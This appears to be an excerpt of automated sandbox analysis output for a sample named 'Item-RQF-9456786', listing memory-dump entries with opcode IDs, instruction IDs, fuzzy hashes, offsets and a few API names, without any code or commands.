                                                                                    • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                    • Instruction Fuzzy Hash: 0B018F322045809FE322871DCA88FA7FBE8EF45754F1904A5FA05CB791DB38DC40C621
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a83c5eda68f5240a1271624444b69a75eae4b85a545d05a0d24dec8d0e3917fb
                                                                                    • Instruction ID: 1ac5714d2bb1d74203365c20e18a5c0a9fe02b5cf4aba9d4028d318517b2ffa9
                                                                                    • Opcode Fuzzy Hash: a83c5eda68f5240a1271624444b69a75eae4b85a545d05a0d24dec8d0e3917fb
                                                                                    • Instruction Fuzzy Hash: 8D01A731704509DFDB14EB6DEC089AEF7E9FF45620B5940A9DA01DB784DE20DE05C792
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4220777ce5b5495c948e750c73c6f4cfb7a3306eec5f42ed0f56255fea34f5c2
                                                                                    • Instruction ID: e45be4a676e48b75aece5dd80c8da7d1c99d141597bbebbf6988d41010120109
                                                                                    • Opcode Fuzzy Hash: 4220777ce5b5495c948e750c73c6f4cfb7a3306eec5f42ed0f56255fea34f5c2
                                                                                    • Instruction Fuzzy Hash: A1F0F432A42A10B7C732DB5ACC84F47FAAAEBC4B90F104168E60597640DA30ED01DAA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                    • Instruction ID: 6a612bfd5dc0a874a068c723d09c5be26afb461f7add8819685449071895558c
                                                                                    • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                    • Instruction Fuzzy Hash: 7FF0C2B3600611ABD325CF4DDC40E57FBEADBD5B80F04812CA609CB220EA31ED04CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                    • Instruction ID: 14d911da17c942933627f544b3e712701d0f0fad72acca80d0e3963ecad6b01d
                                                                                    • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                    • Instruction Fuzzy Hash: A0F0FC332046639BDF3316596844B6BE9958FD5A64F190035E30D9B244CA608D0956D2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                    • Instruction ID: a46c41a14af5b50bbe402efdf94818c698ff9c256db342a9256499ba7be68e51
                                                                                    • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                    • Instruction Fuzzy Hash: 5201F9326406899BD323971DCC49F59FBACEF82754F0944A9FA04DB691DB74CA40C211
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d82e77ece2bd87824b66acb5ea1138b484c027a4d8dc46223f5fb09a69670d9d
                                                                                    • Instruction ID: 2f79e4e4e7461e6e5d80897eed723f8d66b270eb29a83c1c0961e6103723f6ce
                                                                                    • Opcode Fuzzy Hash: d82e77ece2bd87824b66acb5ea1138b484c027a4d8dc46223f5fb09a69670d9d
                                                                                    • Instruction Fuzzy Hash: BC018F71A10249AFDB00DFA9D845AEEBBF8BF58314F14005AE505E7280E734EA01CB94
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                    • Instruction ID: 6afa0901f4cf4c36c1126d5d1e64ca5639833494c4d1788abb7e1bfdc6bfff82
                                                                                    • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                    • Instruction Fuzzy Hash: 5DF0127210001DBFEF029F94DD80DEF7B7DFB55798B104129FA1192160D635DE21A7A0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b0b4925a6fd01c6e59f6638ef765e177764688bf0921607c91d352159163cb0b
                                                                                    • Instruction ID: 1cf266568112b5c696127f77aeb16c22e1879d5c51c459c2c7eda7468499cca5
                                                                                    • Opcode Fuzzy Hash: b0b4925a6fd01c6e59f6638ef765e177764688bf0921607c91d352159163cb0b
                                                                                    • Instruction Fuzzy Hash: 9C018936100119ABCF129E84D940EDA7F66FF4C754F058106FE18A6620C336DAB0EF81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 51d30044f6dcb2a79ba72f4e7cca5e025010579d0d5243d1221ed57539a49b6c
                                                                                    • Instruction ID: 6c43804fc8bf9bf494a4c08e88f308b692cadb5de56a1ed1831b0875df8ac413
                                                                                    • Opcode Fuzzy Hash: 51d30044f6dcb2a79ba72f4e7cca5e025010579d0d5243d1221ed57539a49b6c
                                                                                    • Instruction Fuzzy Hash: 07F024F22882415BFF169619AC05B32F69AE7C0650F65807AEB058B2D1EA70DC0583A8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5932f02e394e50f85535ed673162622bc8b8e023b4aa5b6aa53b4bc54b3170f1
                                                                                    • Instruction ID: 4a2e2e4f72588d2f76a78f9c9320bf034a240cd84f3bfe4d022c9ac607b15a83
                                                                                    • Opcode Fuzzy Hash: 5932f02e394e50f85535ed673162622bc8b8e023b4aa5b6aa53b4bc54b3170f1
                                                                                    • Instruction Fuzzy Hash: 2501A4712006859BE3239B6CCD48F65B7E8BB40B04F980594FA02CB6DAD768D6C18610
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                    • Instruction ID: 02ba3e093b89021263a7f2f5cfc39d1cbbb592f76194347b4136160494e29f6c
                                                                                    • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                    • Instruction Fuzzy Hash: 38F0AE37341E1747E776AA2D9414F2FE695AF90F51F05052CA556CB640DF60DD01C790
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8f9131eec53f2230f9a54d4f10b429ef831d3b6fa8ab960720cdb032f4f556dd
                                                                                    • Instruction ID: 6bc764c4d7d44ffd304cfff4cb6852ca3ab287a8a6c9766d5646139e6e34d87b
                                                                                    • Opcode Fuzzy Hash: 8f9131eec53f2230f9a54d4f10b429ef831d3b6fa8ab960720cdb032f4f556dd
                                                                                    • Instruction Fuzzy Hash: 06F0A4706053049FC310EF28C445E2EB7E4FF58714F40465AB894DB394E634EA00C756
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                    • Instruction ID: bcba071f42b0064f1205c7a29a63c533f9fc3e14841c31f1a46402d8c438929d
                                                                                    • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                    • Instruction Fuzzy Hash: EAF054337115219BD3329A4ECCC0F16B768AFD5B60F190465EA54DB264C7A0ED8187D4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                    • Instruction ID: 99dd0bb410a2787ffd581fb0ebf0e87224e8061264122b0ff0a249861019dd9e
                                                                                    • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                    • Instruction Fuzzy Hash: 0AF02472600204AFE714DB21CD06F86F7F9EF98300F148078A545C7164FAB0ED10C654
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 55bb3332b16af8a17ab549837521ceb2dd6461cbad0ae1d996c6c1d19c7130ca
                                                                                    • Instruction ID: 94e3ede71048611eb505aa6b0d60509d85833652ac7dd53dc13b29f197d9c6e2
                                                                                    • Opcode Fuzzy Hash: 55bb3332b16af8a17ab549837521ceb2dd6461cbad0ae1d996c6c1d19c7130ca
                                                                                    • Instruction Fuzzy Hash: 28F04F70A01249AFCB04EF69D559EAEB7F4EF18344F008055A955EB395DA34EB01CB50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                    • Instruction ID: 82e0d32256a920b3e4a60e205124c75b07efa6875cba199bef9a6659052dfc2c
                                                                                    • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                    • Instruction Fuzzy Hash: 58C01232290648AFC712AA99CD41F42BBA9EBA8B40F000421F2048B6B0C631E860EA84
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                    • Instruction ID: 7447321bb6778e9e444c0817cc9a5cdf2cc239e4811c6ebb08c69263d02a5c73
                                                                                    • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                    • Instruction Fuzzy Hash: 15D01236100248EFCB01DF41C890D9AB72AFBD8B10F10801DFD19076108A31ED63DA90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                    • Instruction ID: fe7c0f0ac1e1145a16aa1c0edc41b64d89218af9c0168b8833d191b63a4ec52a
                                                                                    • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                    • Instruction Fuzzy Hash: 0AC04C757015418FCF15DF19D6D4F45B7E4F744740F150890E905CB721E724E841CA10
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                    • Instruction ID: 745e7bdd38f6d480a1f6e1ad45b31f0e5208ff56004356eeede27714ab2e20eb
                                                                                    • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                    • Instruction Fuzzy Hash: 3CB01232216545CFC7026720CB04B18B2AABF01BC0F0A00F8650089831DA188910E501
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3625f8d5db97267820d3115a4a9be2ad6785899c92f3cb2304d4c3b07f5f8121
                                                                                    • Instruction ID: 6644c73e3fa28f8e4cb3bf586e6d65db0a26d17d2824564d2a231a11881101ff
                                                                                    • Opcode Fuzzy Hash: 3625f8d5db97267820d3115a4a9be2ad6785899c92f3cb2304d4c3b07f5f8121
                                                                                    • Instruction Fuzzy Hash: 9C900231609800129640725848845478005E7E1301B55C025E1424574CCB14CB6A5362
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 099121dfd00a68608b7b46c81c93abc10576e33c28ad7237d0ce00b6ba6be337
                                                                                    • Instruction ID: b291931a4e87a40471a9ecc4305c6f728e5fa3e5d4b47de65b12ec76c562859e
                                                                                    • Opcode Fuzzy Hash: 099121dfd00a68608b7b46c81c93abc10576e33c28ad7237d0ce00b6ba6be337
                                                                                    • Instruction Fuzzy Hash: 4990026160550042464072584804407A005E7E2301395C129A1554570CC718CA69936A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 16c7ac90fe1343e57c981dca993781e7d3055943be8d885d31e8a3f18430bedb
                                                                                    • Instruction ID: 6c44f5c5bf651923b49305e9fb44a8b91baabc4a1739790133fd8edd0fcfc4fd
                                                                                    • Opcode Fuzzy Hash: 16c7ac90fe1343e57c981dca993781e7d3055943be8d885d31e8a3f18430bedb
                                                                                    • Instruction Fuzzy Hash: 6190023120540802D6807258440464B4005D7D2301F95C029A1025674DCB15CB6D77A2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ccd6f5adf7ca02485e813d7b512c777e8cacd0287ba305db04cbba12341fcd32
                                                                                    • Instruction ID: 7b1ba6754d4c9ee7960e785b3a3a4b0eb73771e98a04e6f7f10f45b0d8ac4b04
                                                                                    • Opcode Fuzzy Hash: ccd6f5adf7ca02485e813d7b512c777e8cacd0287ba305db04cbba12341fcd32
                                                                                    • Instruction Fuzzy Hash: 9290023120944842D64072584404A474015D7D1305F55C025A10646B4DD725CF69B762
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 945589cfd30f504241c027f29658d30a075325852dd936988ce3509c489c24b9
                                                                                    • Instruction ID: 087dd9124830e8a1c4a5d9302d7d1a2d3cc7a6d8bcc504a49d59b6f64a263aca
                                                                                    • Opcode Fuzzy Hash: 945589cfd30f504241c027f29658d30a075325852dd936988ce3509c489c24b9
                                                                                    • Instruction Fuzzy Hash: 6C90023160940802D650725844147474005D7D1301F55C025A1024674DC755CB6977A2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2e61c2a84b38940bfcd98bcf43778a84e57fd024beb8b6e2e567f23edeb32d26
                                                                                    • Instruction ID: 7fc8a785a75296ba99d360c0638f0dc041f30bd1febf5c0ff1ae08ac83b5e600
                                                                                    • Opcode Fuzzy Hash: 2e61c2a84b38940bfcd98bcf43778a84e57fd024beb8b6e2e567f23edeb32d26
                                                                                    • Instruction Fuzzy Hash: 7190023120540802D604725848046874005D7D1301F55C025A7024675ED765CAA57232
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 040d252a758774bd52df40f0d32eac76b18d1022806777b465545bfed7045daa
                                                                                    • Instruction ID: c832d196e41a9951aaecbaafad7b9651a6469ddb13cf567fc6fd441ca621e374
                                                                                    • Opcode Fuzzy Hash: 040d252a758774bd52df40f0d32eac76b18d1022806777b465545bfed7045daa
                                                                                    • Instruction Fuzzy Hash: 9A900225225400020645B658060450B4445E7D7351395C029F24165B0CC721CA795322
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ab7b6d6fe6a6fba33f0d4efdd410da52bb40a89ca3367f0afcf3404e0f3f3e3f
                                                                                    • Instruction ID: ca2ef29ed05e5a28a9142894a2deb963cefc1c507e1fdef0be8db907a2f877b9
                                                                                    • Opcode Fuzzy Hash: ab7b6d6fe6a6fba33f0d4efdd410da52bb40a89ca3367f0afcf3404e0f3f3e3f
                                                                                    • Instruction Fuzzy Hash: 5D900225215400030605B65807045074046D7D6351355C035F2015570CD721CA755222
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e0b8202cf4e6ae777127fe48a59dd766fe47e3ef3ff27b72428769117c83d1c7
                                                                                    • Instruction ID: 39f898736abb3c8ac36f8f185b0d8b5313997ddfe245d2dd3b24bf2ad4288d22
                                                                                    • Opcode Fuzzy Hash: e0b8202cf4e6ae777127fe48a59dd766fe47e3ef3ff27b72428769117c83d1c7
                                                                                    • Instruction Fuzzy Hash: D99002A1205540924A00B3588404B0B8505D7E1201B55C02AE2054570CC625CA659236
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 654a72a869c784e80cb4d76bbc623e257ac8b492cc732e9667e48fa780b7a118
                                                                                    • Instruction ID: 50a82235597b351e2992b5d30f079a6bc7014ebe88bb28efa8f4beea9e501ba8
                                                                                    • Opcode Fuzzy Hash: 654a72a869c784e80cb4d76bbc623e257ac8b492cc732e9667e48fa780b7a118
                                                                                    • Instruction Fuzzy Hash: 5090022130540003D640725854186078005E7E2301F55D025E1414574CDA15CA6A5323
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b529869e3531b0e86a69a12f82021f15a1e36967fd2c8f6e4868fbb6d241d91d
                                                                                    • Instruction ID: ebff6c630a43aa281a827125bb8981e0712b2e54e7ac38fb2bab17018018985c
                                                                                    • Opcode Fuzzy Hash: b529869e3531b0e86a69a12f82021f15a1e36967fd2c8f6e4868fbb6d241d91d
                                                                                    • Instruction Fuzzy Hash: CC90022921740002D6807258540860B4005D7D2202F95D429A1015578CCA15CA7D5322
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5044baa6458567f490969b8cb3f2375990651eeeba64be22a72ab48167cbca10
                                                                                    • Instruction ID: 542fa46c1c09bdf752870486bb3e02cb083f04796fe813daf2275f8fc1d2d118
                                                                                    • Opcode Fuzzy Hash: 5044baa6458567f490969b8cb3f2375990651eeeba64be22a72ab48167cbca10
                                                                                    • Instruction Fuzzy Hash: 1F90022120944442D60076585408A074005D7D1205F55D025A20645B5DC735CA65A232
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8eb2d77104a1e1af0b176298dacec9ef2cdf54e2e657e9d9900aaac880e5152b
                                                                                    • Instruction ID: 65921516359d62f8d5d3d0be205e1e26da0dc8636cbae108dd6a7fa2482c6dfb
                                                                                    • Opcode Fuzzy Hash: 8eb2d77104a1e1af0b176298dacec9ef2cdf54e2e657e9d9900aaac880e5152b
                                                                                    • Instruction Fuzzy Hash: 04900221246441525A45B25844045078006E7E1241795C026A2414970CC626DA6AD722
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                    • API String ID: 48624451-2108815105
                                                                                    • Opcode ID: b9e2d83e92c4964600022c55fe7a69cd323d787078af57e8aaec0b4d3cc3b799
                                                                                    • Instruction ID: 183cafce112d5492bc2b5a0425753c34ccb7e2db340e70736b005c1f0bda4649
                                                                                    • Opcode Fuzzy Hash: b9e2d83e92c4964600022c55fe7a69cd323d787078af57e8aaec0b4d3cc3b799
                                                                                    • Instruction Fuzzy Hash: B051E3B6A04156AECB15DBACC89497EFBFCBB0C240B148269F569E7646D374DE00C7A0
                                                                                    APIs
                                                                                    Strings
